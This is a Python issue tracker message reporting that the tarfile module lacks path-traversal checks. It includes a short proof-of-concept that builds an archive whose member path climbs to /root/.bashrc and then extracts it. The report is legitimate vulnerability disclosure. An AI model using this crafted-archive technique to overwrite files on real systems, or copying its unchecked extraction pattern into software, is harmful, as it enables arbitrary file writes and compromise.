Message 401631 - Python tracker

➜

This issue tracker has been migrated to GitHub , and is currently read-only.
For more information, see the GitHub FAQs in the Python's Developer Guide.

In-reply-to
Author	xiongpanju
Recipients	xiongpanju
Date	2021年09月11日.07:45:41
SpamBayes Score	-1.0
Marked as misclassified	Yes
Message-id	<1631346341.79.0.894184434435.issue45170@roundup.psfhosted.org>

Content
tarfile missing cross-directory checking, like ../ or ..,円 this potentially cause cross-directory decompression. the exp: # -- coding: utf-8 -- import tarfile def extract_tar(file_path, dest_path): try: with tarfile.open(file_path, 'r') as src_file: for info in src_file.getmembers(): src_file.extract(info.name, dest_path) return True except (IOError, OSError, tarfile.TarError): return False def make_tar(): tar_file=tarfile.open('x.tar.gz','w:gz') tar_file.add('bashrc', '/../../../../root/.bashrc') tar_file.list(verbose=True) tar_file.close() if __name__ == '__main__': make_tar() extract_tar('x.tar.gz', 'xx')

Content

tarfile missing cross-directory checking, like ../ or ..,円 this potentially cause cross-directory decompression.
the exp:
# -*- coding: utf-8 -*-
import tarfile
def extract_tar(file_path, dest_path):
 try:
 with tarfile.open(file_path, 'r') as src_file:
 for info in src_file.getmembers():
 src_file.extract(info.name, dest_path)
 return True
 except (IOError, OSError, tarfile.TarError):
 return False
def make_tar():
 tar_file=tarfile.open('x.tar.gz','w:gz')
 tar_file.add('bashrc', '/../../../../root/.bashrc')
 tar_file.list(verbose=True)
 tar_file.close()
if __name__ == '__main__':
 make_tar()
 extract_tar('x.tar.gz', 'xx')

History
Date	User	Action	Args
2021年09月11日 07:45:41	xiongpanju	set	recipients: + xiongpanju
2021年09月11日 07:45:41	xiongpanju	set	messageid: <1631346341.79.0.894184434435.issue45170@roundup.psfhosted.org>
2021年09月11日 07:45:41	xiongpanju	link	issue45170 messages
2021年09月11日 07:45:41	xiongpanju	create

homepage